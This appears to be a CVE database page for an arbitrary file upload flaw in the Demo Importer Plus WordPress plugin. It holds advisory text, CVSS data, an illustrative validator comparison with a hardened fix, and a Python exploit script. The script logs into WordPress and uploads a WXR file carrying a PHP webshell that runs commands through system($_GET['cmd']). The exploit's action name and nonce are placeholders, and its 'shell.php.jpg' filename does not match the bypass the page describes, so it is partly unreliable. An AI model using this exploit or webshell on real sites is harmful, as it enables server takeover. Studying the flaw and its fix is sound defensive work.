Security Vulnerability Report
CVE-2025-13066 CVSS 8.8 HIGH

CVE-2025-13066

Published: 2025-12-05 04:16:00
Last Modified: 2026-04-15 00:35:42

Description

The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
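The bypass class the description names, as an added example that is not code from this page or from the Demo Importer Plus plugin: a naive validator lets any dotted segment of the filename satisfy the extension allow-list and then trusts a content check, so a PHP webshell wrapped in WXR CDATA is "valid WXR" under a name ending in .php; the hardened validator beside it considers only the final extension, allows exactly one, and never stores the upload under the client-supplied name. The function names, the allow-list, and the two sample files are assumptions constructed for illustration, not the plugin's actual check.

```python
"""Double-extension bypass of a WXR upload check, and a hardened version.

Illustrative reconstruction only (not Demo Importer Plus code): the advisory
says a double-extension file was accepted as valid WXR, and naive_is_valid_upload
models that class of mistake.
"""
import os
import re
import secrets
import xml.etree.ElementTree as ET

# Assumption: a demo importer should only ever accept WordPress export files.
ALLOWED_EXTENSIONS = {"xml", "wxr"}
WXR_NS = "http://wordpress.org/export/1.2/"

# Constructed sample inputs: a benign WXR export and a WXR-shaped PHP payload.
BENIGN_WXR = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/">
  <channel><title>Demo</title><wp:wxr_version>1.2</wp:wxr_version></channel>
</rss>"""

WEBSHELL_WXR = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel><title>Demo</title><wp:wxr_version>1.2</wp:wxr_version>
    <item><content:encoded><![CDATA[<?php system($_GET["cmd"]); ?>]]></content:encoded></item>
  </channel>
</rss>"""


def looks_like_wxr(data: bytes) -> bool:
    """Content check: parses as XML, root is <rss>, channel carries wp:wxr_version."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    if root.tag != "rss":
        return False
    return root.find(f"channel/{{{WXR_NS}}}wxr_version") is not None


def naive_is_valid_upload(filename: str, data: bytes) -> bool:
    """Weak check (illustrative): any dotted segment may satisfy the allow-list,
    so 'shell.xml.php' passes, and the content check is satisfied because a
    webshell inside CDATA is still well-formed WXR."""
    segments = filename.lower().split(".")[1:]
    return any(seg in ALLOWED_EXTENSIONS for seg in segments) and looks_like_wxr(data)


def hardened_is_valid_upload(filename: str, data: bytes) -> bool:
    """Only the final extension counts, exactly one extension is allowed, the
    stem is restricted to a safe charset, and the content must still be WXR."""
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    if ext not in ALLOWED_EXTENSIONS or not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):
        return False
    return looks_like_wxr(data)


def storage_name(upload_dir: str) -> str:
    """Never reuse the client-supplied name: a random stem with a fixed .xml
    extension means a validator bypass still cannot produce an executable file."""
    return os.path.join(upload_dir, secrets.token_hex(16) + ".xml")


def evaluate(filename: str, data: bytes) -> dict:
    """Compare both validators on one upload and flag a PHP final extension."""
    return {
        "naive": naive_is_valid_upload(filename, data),
        "hardened": hardened_is_valid_upload(filename, data),
        "ends_in_php": filename.lower().endswith(".php"),
    }


if __name__ == "__main__":
    samples = [
        ("demo-content.xml", BENIGN_WXR),
        ("shell.xml.php", WEBSHELL_WXR),
        ("shell.php", WEBSHELL_WXR),
    ]
    for name, data in samples:
        print(name, evaluate(name, data))
```

The content check alone is the trap: the payload parses as WXR, so the decision has to rest on the stored filename, and the safest stored filename is one the server generates.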

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

Demo Importer Plus for WordPress, all versions up to and including 2.0.6 (per the advisory text; NVD lists no CPE configuration for this CVE).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13066 PoC - Demo Importer Plus Arbitrary File Upload
# Target: WordPress with Demo Importer Plus plugin <= 2.0.6
# The admin-ajax action name, the multipart field name and the nonce value are
# placeholders carried over from this PoC; the advisory does not state them.


def exploit_cve_2025_13066(target_url, username, password, webshell_content):
    """
    Exploit for arbitrary file upload vulnerability in Demo Importer Plus

    Args:
        target_url: Target WordPress site URL
        username: WordPress author+ account username
        password: WordPress account password
        webshell_content: PHP code to be uploaded
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    # GET first so WordPress sets wordpress_test_cookie; wp-login.php rejects a
    # POST carrying testcookie=1 when that cookie is absent
    session.get(login_url, timeout=30)
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    print("[*] Attempting to login to WordPress...")
    session.post(login_url, data=login_data, allow_redirects=True, timeout=30)
    # The auth cookie is named wordpress_logged_in_<hash>, so match on the prefix
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.get_dict()):
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")

    # Step 2: Prepare malicious file with double extension
    # Create a file that bypasses WXR validation but contains PHP code
    malicious_filename = "shell.php.jpg"

    # WXR file structure with embedded PHP code
    wxr_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Demo</title>
    <link>http://example.com</link>
    <description>Demo Import</description>
    <language>en-US</language>
    <wp:wxr_version>1.2</wp:wxr_version>
    <item>
      <title>Malicious Import</title>
      <link>http://example.com/post</link>
      <content:encoded><![CDATA[
{webshell_content}
]]></content:encoded>
    </item>
  </channel>
</rss>'''

    # Step 3: Upload the malicious file via Demo Importer Plus
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    files = {
        'demo_import_file': (malicious_filename, wxr_content.encode(), 'application/octet-stream')
    }
    data = {
        'action': 'demo_importer_plus_import',
        'security': 'nonce_value_here'  # Would need to fetch valid nonce
    }

    print("[*] Uploading malicious file...")
    try:
        response = session.post(upload_url, data=data, files=files, timeout=30)
        print(f"[+] Upload response: {response.status_code}")
        print(f"[*] Response content: {response.text[:500]}")
    except Exception as e:
        print(f"[-] Upload failed: {str(e)}")
        return False
    return True


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_13066.py <target_url> <username> <password> <webshell>")
        print("Example: python cve_2025_13066.py http://target.com admin password '<?php system($_GET[\"cmd\"]); ?>'")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    shell = sys.argv[4]
    exploit_cve_2025_13066(target, user, pwd, shell)
```

References

https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers (plugin changeset on WordPress.org Trac)
https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve (Wordfence advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13066", "sourceIdentifier": "security@wordfence.com", "published": "2025-12-05T04:15:59.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "security@wordfence.com", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "security@wordfence.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers", "source": "security@wordfence.com"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve", "source": "security@wordfence.com"}]}}
```